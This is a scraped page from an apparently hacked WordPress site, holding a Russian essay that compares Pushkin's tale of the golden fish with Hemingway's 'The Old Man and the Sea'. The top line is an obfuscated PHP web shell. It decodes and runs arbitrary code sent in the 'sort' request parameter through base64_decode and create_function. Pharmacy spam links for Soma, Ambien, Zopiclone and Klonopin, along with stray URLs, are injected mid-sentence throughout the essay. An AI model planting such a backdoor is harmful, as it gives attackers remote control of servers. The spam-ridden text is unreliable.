nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ДВА СТАРИКА, ДВЕ РЫБЫ И ОДНА СТАРУХА


       эпиграф

ЛОВИСЬ  РЫБКА  И  БОЛЬШАЯ  И  МАЛАЯ
                                         русская  народная  сказка
МЫ  РОЖДЕНЫ,  ЧТОБ  СКАЗКУ  СДЕЛАТЬ  БЫЛЬЮ
                                         советская  патриотическая  песня

      Вот  чуть  ниже,  жирным  шрифтом  я  привожу  самое   начало   пулитцеровско – Buy Soma On The Internet н о б е л е в с к о г о   литературного   повествования  –  если  кто не  читал   ( дети,  поднимите  руки,  кто  читал  " Старик  и  море " ? ).  Мы  с  детсада   в о с п и т а н ы   на   святоотеческом  преподобном  старике   из  " Сказки   о   золотой  рыбке  ",  который    н е в о д о м   ( неводом  с  берега  не  ловят,  а  только  с  лодок)   с   берега,  с   пляжа   ловил   рыбу,  и  на  безнадёжно   отрицательном  персонаже  –   " жадной "  и  ненасытной  старухе. А   посмотрите-ка   Buy Zopiclone Next Day Delivery Uk для   своего   общего   последетсадовского   развития нобелевский   текст   Хемингуэя:
  Buy Ambien From India
  Buy Zopiclone With Paypal " СТАРИК  РЫБАЧИЛ   О Д И Н   НА  СВОЕЙ   ЛОДКЕ   В  ГОЛЬФСТРИМЕ.  ВОТ  УЖЕ  84   ( ! )  ДНЯ  ОН  ХОДИЛ   ОДИН   В  МОРЕ  И  НЕ  ПОЙМАЛ    Н И     О Д Н О Й    РЫБЫ "
                                                  ( Э.Хемингуэй  " Старик  и  море" )
                                                              ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !
       
В   н е в о д    же   с   б е р е г а , " у  самого  синего  поря ",  повторяю,  да   в   о д и н о ч к у   вообще  ничего  никогда  поймать  нельзя,  потому  что  с   б е р е г а    ловят  только  " бреднями ", ( от  слова  " брод", " брести" ).  Да   и   в    м о р е,   http://persquaremile.com/feeds-2/feed/ в    о д и н о ч к у,   с   л о д к и,   да,   несомненно  же,  с   дырявой, http://ajnuest.com/wp-json/oembed/1.0/embed?url=http://ajnuest.com/books-2/fantasy-romance/ как   и   корыто   в    их    о б щ е м    хозяйстве ! ,  да   н е в о д о м  (то  есть   сетью  от   50  метров  вкруговую   и   высотой 10-15 метров !)  тоже ,  мягко  сказать, проблематично Cheap Ambien !
      А    дети  все  преподаваемые   им   т е х н и ч е с к и е    ляпы  проглотят  ради   некоего   http://ectarc.com/p1000948/ м о р а л ь н о г о  воспитания   и  не  подавятся ?  Ну – ну !

          С   детского  сада   каждому  следующему  нарождённому  поколению  внушают ,  что   дед  хороший,  несчастный,  смиренный.  Деду   не   нужны    л ю б ы е   желания,  которые  в  три  счёта,   т о л ь к о   http://stoemper.com/media/feed/ не   поленись п о ж е л а й ,  могут  избавить  мир  от   войн,  болезней   и   дураков,  а  его  " ненасытная "   бяка-старушенция   сразу  за  счёт  золотой   рыбки  нахально  улучшает  ( ой,  жадная ! )  аварийное  состояние  своей  бытовой  техники  и,  очнувшись  от  бездарности   деда,  начинает   свой   карьерный  рост – откуда  только  что  взялось ? Значит,  в  задавленной  потенции  было !  А  как  же  с  любимым  вопросом  взрослых  к  каждому  ребёнку: " А   ты,  Манечка-Танечка,  когда  вырастишь, Buy Phentermine Cheapest к е м    хочешь  стать ? "  Обнаглевшая  же  старуха,  как  мы  заучили,   вдруг   п о с м е л а   " Buy Klonopin Australia кем-то "  стать.   Стала  расти  над собой,  посмела  повышать  свой   материальный   и  общественный  статус,  кстати,  н и к о г о    не  ущемляя  и  не  подсиживая. А   дед,  который  может  быть  только  коммутатором  между  пунктом  "а"   и   пунктом  "б"   и   который   благодеяния  волшебной  рыбки   приписывает   себе,  обращаясь  к   своей  "половине": " Чай  теперь  твоя  душенька  довольна ? " –  он  " каким  ты  был  –   таким  остался ". . .

     М-да . . . в  лучших  журналистских  и  искусствоведческих  традициях  я  только  сейчас  соблаговолила  поинтересоваться  правильным  названием  сказки  и  краткой  историей  её  происхождения.  Правильное   название  –  " Сказка  о  рыбаке  и  рыбке " ! О профессионале,  которому  даже  себе самому  новой  лодки  не  нужно  –  у  Пушкина  и  сказано:
                                                     …
                                        У  самого   синего   моря
                                        http://crochetncrafts.com/how-to-crochet-the-popcorn-stitch/?share=reddit Они   жили   в   ветхой   землянке
                                         Ровно  30 лет  и  три  года.
                                         Старик   ловил   неводом   рыбу,
                                         А   старуха  пряла   с в о ю   пряжу.

                                          …………………………………………………
                                        Он   рыбачил  30  лет  и  три  года
                                        И   не   слыхивал,  чтоб   рыба   говорила.

      А  что,  ч т о    значит  " с в о ю "   пряжу ?  
     Старик   делом   занимается, ловит   рыбку  в  мутной   воде ( " пришёл   невод   с   тиною   морскою " ! ). Старик,  как  и  хемингуэевский   персонаж, со   стихией  борется ( " Вот   и д ё т    он   к  синему  морю, видит,  на  море   чёрная   буря " ). . . А   в  это время   старуха   с в о е й   дурью  мается !
       Старуха  –  персонаж  постольку  поскольку,  как  говорится,  оттеняющий  внутренний  мир  героя. Но   к т о   кормит  семью ?  Откуда  бесконечное  сырьё   для  пряжи ?  Куда     с б ы в а ю т с я   изготовленые   нити ?  Вы   когда-нибудь  видели  необходимые   для  прядения   т ю к и,  мешки    в о н ю ч е й    и    г р я з н о й    животной   сострижки ? Вы   когда-нибудь  пытались  их  приспособить   к   веретену,  чтобы  из   ваших   рук   их   преобразовать   в   требуемую   нить,  в   десятки  километров   этой  нити  за  " тридцать   лет   и  три   года " ?
       Очень  подивил  меня, важный   биографический   нюанс, когда   я  " задним   числом",  но  догадалась  заглянуть   в  историографические   анналы   Интернета.
  Пушкин  переработал  эту  сказку   из    п р е д ш е с т в у ю щ е г о    фольклорного  материала  в   конце 1833 ( ! ) года, за   три  года  до  смерти, а  не  в   юности,  как  это  может  показаться. То  есть  быв  уже  семейным  человеком,  отцом.  Видно,  был  окружающими  его  тётками,  пардон,  дамами  и  бытовыми  материальными  нуждами  сильно  дОстан,  кормилец – то  . . .

    . . .  Странно   и   то,  почему  же  рыбка  называется   з о л о т о й,  а    Курочка   Р я б а,  несущая   з о л о т ы е   яйца,   не  называется  " золотой "?  Ведь   у ж е   независимо  от  своей   " позолоченности ",  рыбка    и  так  функционально  " д о х о д н а " !   Словосочетание " золотая  рыбка "  в  тексте  сказки  –  дано   как  данность,  и   золотая  она  не  в  смысле  "металлизированная",  а   в  смысле  " доходная ", полезная,  удивительная.  В  этом  смысле  и  хемингуэевская   рыба  –  " з о л о т а я " !

    И  у  Хемингуэя  контакт  с  рыбой,  как  и  в  "Золотой  рыбке ", драматически   окрашен:  объеденная  акулами  рыба, а  в  конце  –  никому  не  нужный  её  остов-скелет. Но  за  что  и  Нобелевская –  за  викинговский   г е р о и з м    старика !
    Почему  же  в  нашей   любимой   д е т с к о й   сказке   просто  катастрофический    финал   с  изобретённой  кем-то  дидактикой,  проповедающей  героическое  смирение  деда  перед   "самодурством "  старухи   и  всеобщее  злорадство  от  " ненасытности "  старухи,  мол  вот   тебе,  вот  тебе, вот  тебе !?  Дети,  очнитесь,  вы  же  уже  взрослые,  пожившие  люди :  катастрофа   в  сказке  –  от  той  же  нестыковки  "М "  и  "Ж" !  В  этой  истории   прослеживается   замызганная   до  карикатурности   история   Адама  и   Евы ,  это  же перелицованный  сюжет   изгнания  из  рая !    М н е,   прожившей   с  мужем  полных   45  лет  в   постоянных   стрессовых  ситуациях,  а  из  них  25 последние  с  ним   лет  в   а б с о л ю т н о   дискомфортных  условиях,  срок  жизни  старика  " со  своею  старухой " 30 лет  и  три  года  несерьёзен,  но  условия  жизни  и  расстановка  претензий  –  очень  и  очень  понятны.  А  если  говорить  о   первооснове  сюжета, то, по   библейским  меркам  ( Адам  прожил  930  лет),  у  этой   несладкой  парочки   ещё   в с ё   впереди:   жить   им   жить   да   поживать  и   добра  наживать,  да   родить  этому  викингу  своего  первенца  –  Каина !

         И  вот  ещё  один  психологический   нюанс,  в  подкорке  у  ребёнка  з а с т р е в а ю щ и й    и   в   процессе   его   личной  жизни  раскручивающийся  до  скандалов  и   разводов.  Ну  отпустил  дед   рыбку,  аскетически  ничего  не  поросив  у  неё,  и   отпустил !  И,  казалось  бы,  хрен  с   ней . . .  Причём   в  советское  время, а   я  сейчас  пересмотрела  мультфильм 1950  года,  я родилась  в  этом  году  и  выросла  с  этим  мульфильмом  – там  оставлено: " Бог  с   тобою,  золотая  рыбка. . . ! " – это  при  поголовной-то  атеизации ! Тоже  тема  для  размышлений. . .( в   этой  неблаговидной   истории   сделать   Бога   е щ ё  неблаговиднее,  ещё  равнодушнее   к  элементарным   н у ж д а м   человечества ? ? ?)

    Но   в о т   ч т о   именно   является  " пусковой   кнопкой "  развития и н т р и г и:  старик  не  таит  своё   доброе  дело  по  отношению к  рыбе  милосердия  –  он  идёт   исповедываться, то  есть   п о в е с т в о в а т ь    старухе  о   своём  великом   а с к е т и ч е с к о м    деянии:  вот   тебе,  баба,   фиг   тебе  это  предложение,  от   которого   я    с м о г    отказаться,  значит,  я   всё-таки    ч т о – т о   м о г у ?   вот   тебе !   вот   тебе !   вот   тебе  !!
    " Молчи,  скрывайся   и   таи . . . "  –  это  не  про  него !  Ему,  подразнив  старуху,  от  неё,  от  её  реакции   е м у    нужна,   элементарная   энергетическая  подпитка.  Но  " не  в  коня  корм ": каким   ты   был  –  таким   остался,  этакий   по   характеру,  как, впрочем,  и  хемингуэевский  старик,  пер-гюнт,  одиссей – берендей . . . Старуха  же, " надавив "  на  старика,  словно  Ева  на  Адама,  всё-таки  заставила  старика  искуситься  от  рыбки  и  познать, что  есть  добро и  что  есть  зло  в  рамках  прибрежной  цивилизации. Но . . .
 
  . . . Однако  вот  какая  "нейтральная "   мысль  мне  сейчас  пришла. Можно   м о р а л ь н ы й   аспект  " Золотой  рыбки " рассматривать  и  так  (как  я)  и  сяк  (как  он  был  нам  с  детства  дан)  –  но  оноральный  аспект,  там  есть,  повторяю,  с  плюсом  ли,  с  минусом  ли. Но  хемингуэйевский  герой,  как  и  Александр  Македонский  Гордиев  узел  просто  разрубает,  просто "спиливает"  райское  дерево  добра  и  зла, этой  проблематики  нет,  есть  героизм  в  голом  виде,  гераклов,  сампсониев . . .западной . . .западных . . . западного  полушария .
 
    А  также,  если  разобраться,  то   и  старуха,  постоянно  прядущая  " свою   пряжу "  –  это  же  аналог  древнегреческой  богини  Ананке.  Согласно  Платону,  между  своих  ног  Ананке  вращает  веретено,  ось  которого  –  ось  мира.  Но  оно  остановится,  если  её  дочери  ( от  Зевса )  мойры,  не   будут   ей  помогать   подкручивать !  Таким  образом,  сказка  Пушкина,  переработанная  из  фольклора  и  которую  Пушкин  хотел  поместить  в   цикл  " Песен   з а п а д н ы х    с л а в я н"   –  просто   к и ш и т    р е л и к т о в ы м и   образами. Но  это   эзотерическое   достояние   сказки  –  свойство   самого  жанра,  а  не  столько   сказочника. Сам   же  автор   этого  парафраза, быв   заядлым   игроком,  невольно  или  вольно  пытался  самому   себе   внушить:  н у ж н о    в о в р е м я    о с т а н о в и т ь с я    в  своих  пожеланиях   всё   большего  и  большего  выиграша.  (  я  же   стёрла  сейчас  здесь  абзац   со  своим  прицелом  на  Нобелевский   выйгрыш  –  вот  единственная  дидактическая   польза    от  этой   сказки-притчи ! " )

        Решила  я  по  этому  поводу  рассказать,  может, и  " с  бородой ",  анекдот.
        Сидят  на  берегу  два  закадычных   рыбака  и  релаксируются. Как   бы  п о п а д а е т с я   им  золотая  рыбка.  Они: " А  вот  и  закуска ! "  Она  им: " Не  ешьте  меня !  Я  вам  любые  три  желания  исполню ! "  Они  смекнули,  что  одно  другому  не  мешает: можно  и   потом  съесть.  Вот  ей  сразу  и  говорят: "  Чтоб  водки  побольше  было ! "  Ррраз !  Бутылок  –  упейся.  Они: " А  чтоб  соответственно  этому  и  закуски ! "  Ррраз  –   деликатесы.  Мужики  спохватились:  что  ж  это  мы  мелочимся ? "  А   ну,  сделай    т а к ,  чтоб  у   нас   в с ё   было ! "    Бац   –  и   водка,  и   закуска   исчезли   вместе   с   рыбкой.  Они  ей  вслед: " Ты  чё  контракта  не  выполняешь !? "   А   она  им: " Всё  правильно !   У  вас  всё    б ы л о  ! "

        Но  не  всё  так  плохо. Старухе  по  изгнанию  из  сказочного рая,  где  она как   бы превысила  свои  полномочия, есть   ч т о  вспомнить   у  своего  привычного,  ещё  больше  р а с с о х ш е г о с я   ( или  по  чьей-то   башке  р а с к о л о т о г о  ?  Ведь новое  же  было! В с ё   реквизировать  после  краха  старухи  вплоть  до  выданного  поначалу   корыта ?  Ну  это  –  что-то  из  области   репрессий  тридцатых   годов !  Корыта,  который  будет  ей   вместо  письменного  стола.  А  аморфному  старику  как  было,  так   и   есть   всё   "по  барабану ".  После  кратковременного  инцидента  с  карьерным  ростом   старухи   всё,  к  его  удовольствию,  стабилизировалось,  и   времени  впереди  –  вечность.  Но  как  в  песне  поётся  " будут   внуки   потом  –  всё  опять  повторится  с  начала ".

        На  примере  старухи   детей  учат  такой  взрослой  функции  как   к л е й м и т ь   позором ( вот  я,  например,  как  хорошо  научилась,  просто  сейчас  мастер-класс) !

        Но  самое  главное  злодеяние  старухи  –  посягательство  на   владычество   м о р с к о е  ! Захотела,  видите  ли,  быть  старуха   ВЛАДЫЧИЦЕЙ  морской ?
        Но   почему   бы  и  нет ? !
        Ребята, опять  же   о ч н и т е с ь  !  Крым  наш  !  Почему  бы  и  не  быть  владычицей   морской ? Это  основа   гражданственности  –  болеть  за  свою  команду ! Это  во-первых.
       Кстати,  устойчивое  словосочетание  " владычица  морей "  со  школы   у  нас  увязывается  с Англией,  и  в  этой   формуле  заложен   какой-то  даже   п и е т е т. ( ой, а  если  вспомнить,  ч т о   М.И.Кутузов   про  этот  остров  говорил  . . . это . . . – "детям  до  шестнадцати" )  Это  во-вторых.
      Поднимите  руки  те,  кто  знает,  какие  события, " курортные  амуры "   к о г о    с    к е м    описывает  Л.Н.Толстой  в  своих  "Севастопольских   рассказах " ??  Ах,  Крымские  войны  Х!Х  века  вы  прогуляли !  . . . Это  в-третьих !

   Так   и  получается,  что  ребёнок,  накормленный  фальшивой  дидактикой  " Золотой  рыбки "  ( я, например )  из   детсада   приходит  в  мясорубку  взрослой  жизни,  пытается  найти  спасение  от  неё  в  частности  в   церкви,  а  там  слышит  проповедь  по  Евангелию  " о  трёх  талантах" –   что,  оказывается,  н е л ь з я   данные   Богом  таланты  ( в  тексте  притчи   –  это   монеты, исторически  называвшиеся  "талантами"  и   выданы  они   сыновьям  их   папой ) зарывать  в  землю  ( фактически    т о    же   с а м о е,  что  отпускать   невостребованными золотых  рыбок  в  воду  –  не  правда  ли ?). Ведь  в  детских  садах  не  пичкают  же  детей  менее  вредной,  чем  " Сказка  о  рыбаке  и  рыбке ",   пушкинской  " Гаврилиадой" ! Тьфу -тьфу-тьфу ,  чтоб  не сглазить !  Почему  же  нас,  перфекционистов  по  природе, пичкают  этой  сказкой ?

У  выросшего  с  младенческого   и   детсадовского   возраста   на  золотой  рыбке  ребёнка   начинается  конфликт  установок: " стой  там  иди  сюда ! "

     " Маленькая  рыбка,  жареный  карась . . . "
. . .  Когда  я   работала  ради  младшенького  нянечкой, а  потом  на   кухне  поваром  в  " комбинате  "ясли-сад",  то  мне  рассказывали такую  вот  страшную  " историю  про  рыбный  суп ".
   Однажды  в  каком-то  детском  заведении  ребёнок  подавился  и  умер  от косточки  рыбы  в  соответственном  супе.  После  этого  на  вечные  времена  в  яслях-садах  запретили  рыбные  супы  и  вообще   рыбу  (80-е  годы;  не  знаю,  как  сейчас). Ну  что  не  тема  для  рассказа ?  Вот  я  и  рассказала. Эту  трагическую  тему  можно  " раскрупнить ",  если  сопоставить  с  аналогичной,  но  выявить  в  этом  сопоставлении  объединяющую  нас  всех  преступную   человеческую,  можно  сказать  –  реликтовую   г л у п о с т ь.  А   именно.
   Также  мне  рассказывали  такую  же  трагическую   историю  про  то, как   где-то  в  детском  саду  ребёнок  подавился  хлебным  мякишем.  Вызвали  скорую,  врач,  усмехнувшись,  стал,  по  народному  обычаю,  стучать  ладошкой  по  спине  ребёнка.  Тот  окончательно  задохнулся  и  умер.  Но  почему-то  на   веки  вечные   х л е б ,  в   отличие   от   рыбных   супов,  в   детских  госучреждениях   не  запретили . . . (ой, кстати,  как  и  придурков  некоторых  троечников-врачей).
    Давеча  у  меня  среди  гостей  была  воспитательница  детского  сада,  которая,  испугавшись  моей  критики  "Золотой  рыбки ",  заткнула  уши  с  просьбой  не  смущать  её,  так  как  эта  сказка  находится  в   их   незыблемом   методическом   плане   воспитательной   работы,  а   она   не   хочет   и   даже    б о и т с я    напрягать   себя   и   пересматривать,   ч т о    такое   хорошо  и    ч т о   такое   плохо.  . . .  Приветик  вашим  деткам  и  погладьте  от  меня  ваши  стиральные  машины,  эти  ваши,  надеюсь,  недырявые  корыта  !
      Есть   любимые  были,  есть   любимые   небылицы,  а   есть   любимые     маразмы.  И  не   так  страшен    м а р а з м,   как  его  малюют,  а   страшно  при   нём   слово   любимый,   потому   что  в   нами   любимых  чьих-то   м а р а з м а х   законсервировано   банкротство любовий   того   или   другого  автора. Поэтому   они  нам  и  близки,  просто  как  родные !

                              +
петр  иоанн  андрей
филипп  фома  варфоломей
два иакова  матфей
иуда яковль ,т.е. ф а д д е й
зилота симон  и  матфИй


Добавить комментарий